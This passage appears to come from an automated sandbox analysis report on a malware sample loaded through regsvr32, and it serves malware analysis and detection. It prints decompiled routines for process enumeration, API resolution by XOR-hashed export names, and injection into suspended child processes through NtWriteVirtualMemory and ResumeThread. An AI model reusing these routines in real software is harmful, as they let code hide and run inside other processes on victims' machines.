                                                                                                                                                                        				E05B99E51( &(_t43[E05B9A456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                        				lstrcatW(_t43, _t56);
                                                                                                                                                                        				_t38 = E05B9A456(_t43);
                                                                                                                                                                        				_v12 = _t38;
                                                                                                                                                                        				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                        				return E05B9E2C5(_t43, E05B9A456(_t43) + _t40, 0);
                                                                                                                                                                        			}

















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 05B9C633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 05B9C665
                                                                                                                                                                          • Part of subcall function 05B99E51: _vsnwprintf.MSVCRT ref: 05B99E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 05B9C69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 05B9C6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E05B9B96A(void* __ecx, void* __edx) {
                                                                                                                                                                        				void* _v304;
                                                                                                                                                                        				void* _v308;
                                                                                                                                                                        				intOrPtr _v312;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t43;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        
                                                                                                                                                                        				_t33 = __edx;
                                                                                                                                                                        				_v304 = __ecx;
                                                                                                                                                                        				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                        				_t45 = _t16;
                                                                                                                                                                        				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                        				if(_t45 != _t17) {
                                                                                                                                                                        					E05B98D6D( &_v304, 0, 0x128);
                                                                                                                                                                        					_v304 = 0x128;
                                                                                                                                                                        					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                        						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                        						FindCloseChangeNotification(_t45);
                                                                                                                                                                        						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t30 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                        						_t17 = 0xfffffffe;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t17;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 05B9B988
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 05B9B9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 05B9B9EB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 05B9B9F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2518216231-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 190 5b9eebb-5b9eed2 191 5b9ef2f 190->191 192 5b9eed4-5b9eefc 190->192 194 5b9ef31-5b9ef35 191->194 192->191 193 5b9eefe-5b9ef21 call 5b9a43d call 5b9e2c5 192->193 199 5b9ef23-5b9ef2d 193->199 200 5b9ef36-5b9ef4d 193->200 199->191 199->193 201 5b9ef4f-5b9ef57 200->201 202 5b9efa3-5b9efa5 200->202 201->202 203 5b9ef59 201->203 202->194 204 5b9ef5b-5b9ef61 203->204 205 5b9ef71-5b9ef82 204->205 206 5b9ef63-5b9ef65 204->206 208 5b9ef84-5b9ef85 205->208 209 5b9ef87-5b9ef93 LoadLibraryA 205->209 206->205 207 5b9ef67-5b9ef6f 206->207 207->204 207->205 208->209 209->191 210 5b9ef95-5b9ef9f GetProcAddress 209->210 210->191 211 5b9efa1 210->211 211->194
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9EEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				struct HINSTANCE__* _t58;
                                                                                                                                                                        				_Unknown_base(*)()* _t59;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				void* _t69;
                                                                                                                                                                        				char _t70;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				CHAR* _t80;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        
                                                                                                                                                                        				_t75 = __ecx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                        				if(_t41 == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t62 = _t41 + __ecx;
                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                        				_t47 = 0;
                                                                                                                                                                        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v16 = _t63;
                                                                                                                                                                        				if(_t63 == 0) {
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L2;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t49 = E05B9E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E05B9A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                        					_t51 = _v8;
                                                                                                                                                                        					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t73 = _v20;
                                                                                                                                                                        					_t47 = _t51 + 1;
                                                                                                                                                                        					_v8 = _t47;
                                                                                                                                                                        					if(_t47 < _v16) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                        					return _t80;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t56 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t70 = _t80[_t56];
                                                                                                                                                                        						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                        						_t56 = _t56 + 1;
                                                                                                                                                                        						if(_t56 < 0x40) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                        					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                        						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                        					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                        					if(_t58 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                        					if(_t59 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t59;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 05B9EF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05B9EF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: 62b62b1cb054b079ef4944f37df321bd650328218560beca768f7d3936e0c64b
                                                                                                                                                                        • Instruction ID: abb173433d3eab430ddc3a10da00c60e0a3cb77d04e46be8915e3d2a19a5810c
                                                                                                                                                                        • Opcode Fuzzy Hash: 62b62b1cb054b079ef4944f37df321bd650328218560beca768f7d3936e0c64b
                                                                                                                                                                        • Instruction Fuzzy Hash: 37318F71A045159BDF28CF69C884BAEBBE9FF44244F2844BAD846E7351DB30F9418B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 212 5b9c7f5-5b9c815 GetTokenInformation 213 5b9c85b 212->213 214 5b9c817-5b9c820 GetLastError 212->214 216 5b9c85d-5b9c861 213->216 214->213 215 5b9c822-5b9c832 call 5b98bde 214->215 219 5b9c838-5b9c84b GetTokenInformation 215->219 220 5b9c834-5b9c836 215->220 219->213 221 5b9c84d-5b9c859 call 5b98bf4 219->221 220->216 221->220
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E05B9C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                        				_t28 = __edx;
                                                                                                                                                                        				_t20 = _t22;
                                                                                                                                                                        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					_t12 = _t31;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t31 = E05B98BDE(_v8);
                                                                                                                                                                        					_v12 = _t31;
                                                                                                                                                                        					if(_t31 != 0) {
                                                                                                                                                                        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                        							goto L6;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							E05B98BF4( &_v12, _t16);
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t12;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05B90000,00000000,00000000,?,05B9C876,00000000,00000000,?,05B9C89F), ref: 05B9C810
                                                                                                                                                                        • GetLastError.KERNEL32(?,05B9C876,00000000,00000000,?,05B9C89F,00001644,?,05B9DFCE), ref: 05B9C817
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,05B9C876,00000000,00000000,?,05B9C89F,00001644,?,05B9DFCE), ref: 05B9C846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: 3d745f89ec45376133371f628f35e879dbb0dbd45e32f6028bf80873930cbcbf
                                                                                                                                                                        • Instruction ID: 175ad02f621daf797686bf8ad2022720db5a4044a32d0a60ab3827c7a675194f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d745f89ec45376133371f628f35e879dbb0dbd45e32f6028bf80873930cbcbf
                                                                                                                                                                        • Instruction Fuzzy Hash: 60018FB6600114BF8F289AA5DC89DFB7FADEE456A071004B9F905E2110EA61FE0086E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 224 5b9bc84-5b9bcd3 call 5b98d6d * 2 CreateProcessW
                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E05B9BC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                        				struct _STARTUPINFOW _v72;
                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                        
                                                                                                                                                                        				E05B98D6D(__edx, 0, 0x10);
                                                                                                                                                                        				E05B98D6D( &_v72, 0, 0x44);
                                                                                                                                                                        				_v72.cb = 0x44;
                                                                                                                                                                        				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~( ~_t11) - 1;
                                                                                                                                                                        			}






                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 05B9BCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcessmemset
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 2296119082-2746444292
                                                                                                                                                                        • Opcode ID: 2f4c913025e975b094e9b46963fcdbeb70cdabdebd6de4c3cb20b7a2b6ca91c9
                                                                                                                                                                        • Instruction ID: 7d6c60e655ff934027c382c1274d3a71f063be36612db09b6b28c5496b456213
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f4c913025e975b094e9b46963fcdbeb70cdabdebd6de4c3cb20b7a2b6ca91c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF030F16402087EFB20E6659C0BFBF7AACDB81710F500165BA05EB1C0EAA0AD0582A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 229 5b9d804-5b9d824 call 5b9d6dc 232 5b9d82a-5b9d849 call 5b9b557 229->232 233 5b9d955-5b9d958 229->233 236 5b9d84f-5b9d851 232->236 237 5b9d945-5b9d954 call 5b98bf4 232->237 238 5b9d933-5b9d943 call 5b98bf4 236->238 239 5b9d857-5b9d859 236->239 237->233 238->237 241 5b9d85c-5b9d85e 239->241 244 5b9d921-5b9d92d 241->244 245 5b9d864-5b9d883 call 5b98d6d call 5b9bc84 241->245 244->236 244->238 251 5b9d8e5-5b9d8e9 245->251 252 5b9d885-5b9d898 call 5b9d959 245->252 253 5b9d8eb-5b9d8ed 251->253 254 5b9d914-5b9d91b 251->254 252->251 259 5b9d89a-5b9d8b2 252->259 256 5b9d8ef-5b9d8f5 253->256 257 5b9d8fe-5b9d90e 253->257 254->241 254->244 256->257 257->254 262 5b9d8e2 259->262 263 5b9d8b4-5b9d8c9 GetLastError call 5b9da57 259->263 262->251 266 5b9d8cb-5b9d8d6 263->266 267 5b9d8de-5b9d8df FindCloseChangeNotification 263->267 269 5b9d8d9 266->269 270 5b9d8d8 266->270 267->262 269->267 270->269
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E05B9D804(intOrPtr __edx) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				char _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				intOrPtr _t86;
                                                                                                                                                                        				char _t87;
                                                                                                                                                                        				void* _t88;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_t86 = 0;
                                                                                                                                                                        				_t37 = E05B9D6DC( &_v16);
                                                                                                                                                                        				_t87 = _t37;
                                                                                                                                                                        				_v24 = _t87;
                                                                                                                                                                        				_t89 = _t87;
                                                                                                                                                                        				if(_t87 == 0) {
                                                                                                                                                                        					return _t37;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t38 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        				_t7 = _t38 + 0xac; // 0x7fc38876
                                                                                                                                                                        				E05B9B557( &_v80,  *_t7 + 7, _t89);
                                                                                                                                                                        				_v12 = _v12 & 0;
                                                                                                                                                                        				_t67 = _v16;
                                                                                                                                                                        				if(_t67 == 0) {
                                                                                                                                                                        					L21:
                                                                                                                                                                        					E05B98BF4( &_v24, 0);
                                                                                                                                                                        					return _t86;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_t86 == 0) {
                                                                                                                                                                        					_t69 = 0;
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					while(_t86 == 0) {
                                                                                                                                                                        						E05B98D6D( &_v40, _t86, 0x10);
                                                                                                                                                                        						_t88 = _t88 + 0xc;
                                                                                                                                                                        						_t49 = E05B9BC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
                                                                                                                                                                        						_t94 = _t49;
                                                                                                                                                                        						if(_t49 >= 0) {
                                                                                                                                                                        							_t56 = E05B9D959(E05B961C5,  &_v40, _t94, _v20); // executed
                                                                                                                                                                        							if(_t56 != 0) {
                                                                                                                                                                        								_t59 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
                                                                                                                                                                        								if(_t70 != 0) {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t62 = E05B9DA57( &_v40);
                                                                                                                                                                        									_t63 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        									if(_t62 != 0) {
                                                                                                                                                                        										_push(0xea60);
                                                                                                                                                                        										_push(_t70);
                                                                                                                                                                        										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
                                                                                                                                                                        											_t86 = _t86 + 1;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t63 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        									}
                                                                                                                                                                        									FindCloseChangeNotification(_t70);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t69 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v40 != 0) {
                                                                                                                                                                        							if(_t86 == 0) {
                                                                                                                                                                        								_t54 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t50 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t50 + 0x30))(_v36);
                                                                                                                                                                        							_t52 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t52 + 0x30))(_v40);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t69 = _t69 + 1;
                                                                                                                                                                        						_v8 = _t69;
                                                                                                                                                                        						if(_t69 < 2) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t67 = _v16;
                                                                                                                                                                        					_t45 = _v12 + 1;
                                                                                                                                                                        					_v12 = _t45;
                                                                                                                                                                        					if(_t45 < _t67) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					} while (_t67 != 0);
                                                                                                                                                                        					goto L21;
                                                                                                                                                                        				}
                                                                                                                                                                        				L20:
                                                                                                                                                                        				E05B98BF4(_t87, 0xfffffffe);
                                                                                                                                                                        				_t87 = _t87 + 4;
                                                                                                                                                                        				_t67 = _t67 - 1;
                                                                                                                                                                        			}




























                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                          • Part of subcall function 05B9BC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 05B9BCC6
                                                                                                                                                                          • Part of subcall function 05B9D959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 05B9D9BB
                                                                                                                                                                          • Part of subcall function 05B9D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05B9DA04
                                                                                                                                                                          • Part of subcall function 05B9D959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 05B9DA21
                                                                                                                                                                          • Part of subcall function 05B9D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 05B9DA42
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 05B9D8B4
                                                                                                                                                                          • Part of subcall function 05B9DA57: ResumeThread.KERNELBASE(?,05B9D8C2,?,?,00000001), ref: 05B9DA5F
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 05B9D8DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2212882986-0
                                                                                                                                                                        • Opcode ID: 76dce4bda0b224b2715bb2e819d865437f2c163d0c6220fed7179586b5e5c24d
                                                                                                                                                                        • Instruction ID: 3e176d5c3ba3f38bf9c5bd7555ad3e50b1174f5431072e6fa814c60abff1b347
                                                                                                                                                                        • Opcode Fuzzy Hash: 76dce4bda0b224b2715bb2e819d865437f2c163d0c6220fed7179586b5e5c24d
                                                                                                                                                                        • Instruction Fuzzy Hash: 01414175A00209AFDF14EF96D989EFDB7B9FF48310F1040B9E505A7151DB30B9458B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                        				WCHAR* _t23;
                                                                                                                                                                        				long _t24;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        				void* _t48;
                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				if(_a8 != 1) {
                                                                                                                                                                        					__eflags = _a8;
                                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                        						return 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t15 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				E05B98BC9();
                                                                                                                                                                        				E05B99591();
                                                                                                                                                                        				 *0x5baf830 = _a4;
                                                                                                                                                                        				E05BA3CD5(_a4);
                                                                                                                                                                        				 *_t49 = 0xf43;
                                                                                                                                                                        				 *0x5baf818 = E05B9F05C(0x5baca50, 0x138);
                                                                                                                                                                        				 *_t49 = 0x111;
                                                                                                                                                                        				_t23 = E05B99DF2(0x5baca50);
                                                                                                                                                                        				_pop(_t41);
                                                                                                                                                                        				_a8 = _t23;
                                                                                                                                                                        				_t24 = GetFileAttributesW(_t23); // executed
                                                                                                                                                                        				_push( &_a8);
                                                                                                                                                                        				if(_t24 == 0xffffffff) {
                                                                                                                                                                        					E05B98BAF();
                                                                                                                                                                        					 *_t49 = 0x40e;
                                                                                                                                                                        					_t28 = E05B99CB5(E05B9109A(_t41));
                                                                                                                                                                        					_a8 = _t28;
                                                                                                                                                                        					__eflags = _t28;
                                                                                                                                                                        					if(_t28 != 0) {
